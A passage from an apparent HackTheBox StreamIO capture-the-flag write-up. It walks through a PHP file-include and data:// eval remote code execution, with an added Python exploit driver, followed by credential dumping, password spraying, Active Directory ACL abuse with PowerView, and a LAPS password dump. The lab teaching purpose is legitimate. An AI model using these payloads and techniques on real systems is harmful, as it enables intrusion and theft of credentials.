It says the option is for developers only. Setting debug=master.php brings up the movie, staff and user management details, so the parameter value is passed to a PHP include. Try a php:// stream wrapper to read the source instead of executing it:
```
https://streamio.htb/admin/?debug=php://filter/read=convert.base64-encode/resource=master.php
```
Base64-decoding the result gives the source of master.php:
```php
<h1>Movie managment</h1>
<?php
if (!defined('included'))
	die("Only accessable through includes");
if (isset($_POST['movie_id'])) {
	$query = "delete from movies where id = ".$_POST['movie_id'];
	$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from movies order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while ($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC)) {
?>
<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['movie']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST" action="?movie=">
				<input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>Staff managment</h1>
<?php
if (!defined('included'))
	die("Only accessable through includes");
$query = "select * from users where is_staff = 1";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
if (isset($_POST['staff_id'])) {
?>
<div class="alert alert-success">
	Message sent to administrator
</div>
<?php
}
$query = "select * from users where is_staff = 1";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while ($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC)) {
?>
<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['username']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST">
				<input type="hidden" name="staff_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>User managment</h1>
<?php
if (!defined('included'))
	die("Only accessable through includes");
if (isset($_POST['user_id'])) {
	$query = "delete from users where is_staff = 0 and id = ".$_POST['user_id'];
	$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from users where is_staff = 0";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while ($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC)) {
?>
<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['username']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST">
				<input type="hidden" name="user_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<form method="POST">
	<input name="include" hidden>
</form>
<?php
if (isset($_POST['include'])) {
	if ($_POST['include'] !== "index.php")
		eval(file_get_contents($_POST['include']));
	else
		echo(" ---- ERROR ---- ");
}
?>
```
Look at the last block of PHP:
```php
<?php
if (isset($_POST['include'])) {
	if ($_POST['include'] !== "index.php")
		eval(file_get_contents($_POST['include']));
	else
		echo(" ---- ERROR ---- ");
}
?>
```
If the include value we POST is data://text/plain,phpinfo();, file_get_contents() returns the body of the data: URI, which goes straight into eval(), so phpinfo() runs. Two details matter: eval() expects PHP code without an opening <?php tag, and this works even when allow_url_include is off, because that setting only restricts include/require; the data:// wrapper is available to file_get_contents() regardless. Let's try:

Sure enough, phpinfo appears. Replacing phpinfo(); with system('command') executes arbitrary commands. I used that to upload a webshell and connected to it with AntSword. The current user is yoshihide, which has no home directory and exists only to run the web application. Auditing the code afterwards revealed two MSSQL credential pairs:
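The two wrapper tricks used above, reading source through php://filter and turning eval(file_get_contents()) into command execution through data://, put together in a small Python driver. This is an added example, not code from the writeup. The /admin/ URL and the debug/include parameter names come from the page; the PHPSESSID cookie name, the argv handling and the "longest base64 run" heuristic for pulling the encoded file out of the admin page are assumptions, and the SAMPLE_* values are constructed so the parsing can be exercised offline.

```python
import base64
import re

ADMIN = "https://streamio.htb/admin/"


def filter_read_url(resource: str) -> str:
    """GET URL that makes the debug include read `resource` through the
    convert.base64-encode filter, so PHP source is echoed instead of executed."""
    return f"{ADMIN}?debug=php://filter/read=convert.base64-encode/resource={resource}"


def extract_base64_source(body: str, min_len: int = 64) -> str:
    """The include echoes the encoded file inline in the admin page; take the
    longest base64 run and decode it, re-padding in case '=' was trimmed."""
    runs = re.findall(r"[A-Za-z0-9+/]{%d,}={0,2}" % min_len, body)
    if not runs:
        raise ValueError("no base64 blob in response")
    blob = max(runs, key=len)
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", "replace")


def data_wrapper_payload(php: str) -> str:
    """Value for the `include` POST field. file_get_contents() returns the body
    of the data: URI verbatim and eval() runs it, so the code must NOT start
    with an opening <?php tag. Works with allow_url_include=Off: that setting
    only gates include/require, not file_get_contents()."""
    return "data://text/plain," + php


def rce_form(cmd: str) -> dict:
    """Form body that runs `cmd` via system(); escapes for a PHP single-quoted
    string so backslashes and quotes in the command survive."""
    php = "system('%s');" % cmd.replace("\\", "\\\\").replace("'", "\\'")
    return {"include": data_wrapper_payload(php)}


# Constructed sample: what the debug page would contain for a tiny master.php.
SAMPLE_SOURCE = (
    "<h1>Movie managment</h1>\n<?php\n"
    "if (isset($_POST['include'])) eval(file_get_contents($_POST['include']));\n"
)
SAMPLE_RESPONSE = ("<html><body><h1>Admin panel</h1>\n"
                   + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
                   + "\n</body></html>")


if __name__ == "__main__":
    import sys
    import requests  # assumption: argv[1] is the PHPSESSID of the logged-in yoshihide session
    cookies = {"PHPSESSID": sys.argv[1]}
    r = requests.get(filter_read_url("master.php"), cookies=cookies, verify=False, timeout=10)
    print(extract_base64_source(r.text)[:300])
    r = requests.post(ADMIN + "?debug=master.php", data=rce_form("whoami"),
                      cookies=cookies, verify=False, timeout=10)
    print(r.text[-500:])
```

The POST goes to `?debug=master.php` because the `include` handler lives in master.php and only runs once that file has been pulled in by the debug include; posting `include` to /admin/ alone would never reach it.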
```php
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
```
AntSword's database plugin can connect straight to MSSQL with these (sqlcmd works too; `where.exe sqlcmd` locates the binary). Query the users table of the streamio_backup database seen in the sysdatabases listing:

There is a row with username nikk37, which did not appear in the STREAMIO database. Export the result with AntSword to CSV:
```
$ cat 10.10.11.158_20231210123309.csv
id,username,password
8,Sabrina,f87d3c0d6c8fd686aacc6627f1f493a5
7,William,d62be0dc82071bccc1322d64ec5b6c51
6,Lauren,08344b85b329d7efd611b7a7743e8a09
5,Samantha,083ffae904143c4796e464dac33c1f7d
4,Theodore,925e5408ecb67aea449373d668b7359e
3,James,c660060492d9edcaa8332d89c99c9239
2,yoshihide,b779ba15cedfd22a023c4d8bcf5f2332
1,nikk37,389d14cb8e4e9b94b137deb1caf0612a
```
Process and crack the data as before; the result:
```
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
Lauren:08344b85b329d7efd611b7a7743e8a09:
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
nikk37:389d14cb8e4e9b94b137deb1caf0612a:get_dem_girls2@yahoo.com
```
Logging in over WinRM with evil-winrm as nikk37:get_dem_girls2@yahoo.com succeeds:
## GetAdministrator

First upload SharpHound.exe and run a collection:

Download the zip it produces and import it into BloodHound:

The user highlighted in the graph is jdgodd and the group is CORE STAFF. jdgodd has WriteOwner over CORE STAFF, and members of CORE STAFF can read the LAPS password. CORE STAFF currently has no members:

So the plan is: obtain jdgodd's password, use it to add jdgodd or nikk37 to CORE STAFF, then dump the LAPS password. Step one is finding jdgodd's password. Upload winPEAS and run it to look for leads:

winPEAS reports that Firefox is installed and finds its credential store; HackBrowserData can dump the saved logins:

Download and unpack the result and the passwords are there:
```
$ cat results/firefox_br53rxeg_default_release_password.json
[
  {
    "UserName": "JDgodd",
    "Password": "password@12",
    "LoginURL": "",
    "CreateDate": "2022-02-22T02:41:51-08:00"
  },
  {
    "UserName": "yoshihide",
    "Password": "paddpadd@12",
    "LoginURL": "",
    "CreateDate": "2022-02-22T02:41:24-08:00"
  },
  {
    "UserName": "nikk37",
    "Password": "n1kk1sd0p3t00:)",
    "LoginURL": "",
    "CreateDate": "2022-02-22T02:41:10-08:00"
  },
  {
    "UserName": "admin",
    "Password": "JDg0dd1s@d0p3cr3@t0r",
    "LoginURL": "",
    "CreateDate": "2022-02-22T02:40:56-08:00"
  }
]
```
But JDgodd:password@12 does not authenticate, so the four passwords need to be sprayed against the four usernames. Collect them into lists:

Spray with cme over SMB:
```
SMB  10.10.11.158  445  DC  [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB  10.10.11.158  445  DC  [-] streamIO.htb\JDgodd:password@12 STATUS_LOGON_FAILURE
SMB  10.10.11.158  445  DC  [-] streamIO.htb\JDgodd:paddpadd@12 STATUS_LOGON_FAILURE
SMB  10.10.11.158  445  DC  [-] streamIO.htb\JDgodd:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE
SMB  10.10.11.158  445  DC  [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r
SMB  10.10.11.158  445  DC  [-] streamIO.htb\yoshihide:password@12 STATUS_LOGON_FAILURE
SMB  10.10.11.158  445  DC  [-] streamIO.htb\yoshihide:paddpadd@12 STATUS_LOGON_FAILURE
SMB  10.10.11.158  445  DC  [-] streamIO.htb\yoshihide:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE
SMB  10.10.11.158  445  DC  [-] streamIO.htb\yoshihide:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE
SMB  10.10.11.158  445  DC  [-] streamIO.htb\nikk37:password@12 STATUS_LOGON_FAILURE
SMB  10.10.11.158  445  DC  [-] streamIO.htb\nikk37:paddpadd@12 STATUS_LOGON_FAILURE
SMB  10.10.11.158  445  DC  [-] streamIO.htb\nikk37:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE
SMB  10.10.11.158  445  DC  [-] streamIO.htb\nikk37:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE
SMB  10.10.11.158  445  DC  [-] streamIO.htb\admin:password@12 STATUS_LOGON_FAILURE
SMB  10.10.11.158  445  DC  [-] streamIO.htb\admin:paddpadd@12 STATUS_LOGON_FAILURE
SMB  10.10.11.158  445  DC  [-] streamIO.htb\admin:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE
SMB  10.10.11.158  445  DC  [-] streamIO.htb\admin:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE
```
That gives a valid domain credential: streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r. It still cannot log in with evil-winrm, though. Check the WinRM service with cme to be sure:
```
SMB    10.10.11.158  5985  DC  [*] Windows 10.0 Build 17763 (name:DC) (domain:streamIO.htb)
HTTP   10.10.11.158  5985  DC  [*] http://10.10.11.158:5985/wsman
WINRM  10.10.11.158  5985  DC  [-] streamIO.htb\JDgodd:password@12
WINRM  10.10.11.158  5985  DC  [-] streamIO.htb\JDgodd:paddpadd@12
WINRM  10.10.11.158  5985  DC  [-] streamIO.htb\JDgodd:n1kk1sd0p3t00:)
WINRM  10.10.11.158  5985  DC  [-] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r
WINRM  10.10.11.158  5985  DC  [-] streamIO.htb\yoshihide:password@12
WINRM  10.10.11.158  5985  DC  [-] streamIO.htb\yoshihide:paddpadd@12
WINRM  10.10.11.158  5985  DC  [-] streamIO.htb\yoshihide:n1kk1sd0p3t00:)
WINRM  10.10.11.158  5985  DC  [-] streamIO.htb\yoshihide:JDg0dd1s@d0p3cr3@t0r
WINRM  10.10.11.158  5985  DC  [-] streamIO.htb\nikk37:password@12
WINRM  10.10.11.158  5985  DC  [-] streamIO.htb\nikk37:paddpadd@12
WINRM  10.10.11.158  5985  DC  [-] streamIO.htb\nikk37:n1kk1sd0p3t00:)
WINRM  10.10.11.158  5985  DC  [-] streamIO.htb\nikk37:JDg0dd1s@d0p3cr3@t0r
WINRM  10.10.11.158  5985  DC  [-] streamIO.htb\admin:password@12
WINRM  10.10.11.158  5985  DC  [-] streamIO.htb\admin:paddpadd@12
WINRM  10.10.11.158  5985  DC  [-] streamIO.htb\admin:n1kk1sd0p3t00:)
WINRM  10.10.11.158  5985  DC  [-] streamIO.htb\admin:JDg0dd1s@d0p3cr3@t0r
```
JDgodd evidently has no WinRM access, so the credential has to be used remotely. Collect BloodHound data with bloodhound-python using it:
```
INFO: Found AD domain: streamio.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: streamio.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: streamio.htb
INFO: Found 8 users
INFO: Found 54 groups
INFO: Found 4 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.streamIO.htb
INFO: Done in 00M 20S
INFO: Compressing output into 20231210133117_bloodhound.zip
```
The KRB_AP_ERR_SKEW warning is the roughly seven-hour clock skew nmap already reported; bloodhound-python falls back to NTLM, so the collection still succeeds. Any tool that has to use Kerberos against this DC needs the local clock aligned with it first, for example by running the tool under faketime with the offset nmap measured. Import the zip into BloodHound and it shows the way forward:

BloodHound's abuse info suggests PowerView's Add-DomainObjectAcl for granting rights on the group. Log in as nikk37 with evil-winrm, upload PowerView and dot-source it:
```powershell
upload ../../../../../home/rainb0w/Tools/PowerSploit/Recon/PowerView.ps1 .
. .\PowerView.ps1
```
Build a credential object for JDgodd, since the actions below must run as that account rather than as nikk37:
```powershell
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamIO.htb\JDgodd', $SecPassword)
```
Use Add-DomainObjectAcl with JDgodd's credential to grant JDgodd full rights on the group, then Add-DomainGroupMember to add nikk37 to CORE STAFF. Strictly speaking, WriteOwner by itself only allows taking ownership of the object; if the ACL write is refused, first run `Set-DomainObjectOwner -Identity 'CORE STAFF' -OwnerIdentity JDgodd -Credential $Cred`, after which the owner is allowed to modify the DACL and the two commands below go through:
```powershell
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "CORE STAFF" -Rights All -PrincipalIdentity JDgodd
Add-DomainGroupMember -Identity 'CORE STAFF' -Members 'nikk37' -Credential $Cred
```
Now dump the LAPS password with the methods described in https://www.hackingarticles.in/credential-dumpinglaps/ . Group membership is evaluated at logon, so the existing nikk37 WinRM session does not yet carry CORE STAFF in its token; the two commands below authenticate afresh over LDAP and therefore see the new membership:
```bash
crackmapexec ldap 10.10.11.158 -u nikk37 -p 'get_dem_girls2@yahoo.com' --kdcHost 10.10.11.158 -M laps
ldapsearch -x -H ldap://10.10.11.158 -D nikk37@streamio.htb -w "get_dem_girls2@yahoo.com" -b "dc=streamio,dc=htb" "(ms-MCs-admpwd=*)" | grep -i ms-mcs-admpwd
```
Finally, log in as Administrator with the recovered LAPS password and read the root flag:

## Summary

This box is not hard, but it covers a lot of ground, which makes it tedious and laborious to work through; in my view the Medium rating is deserved.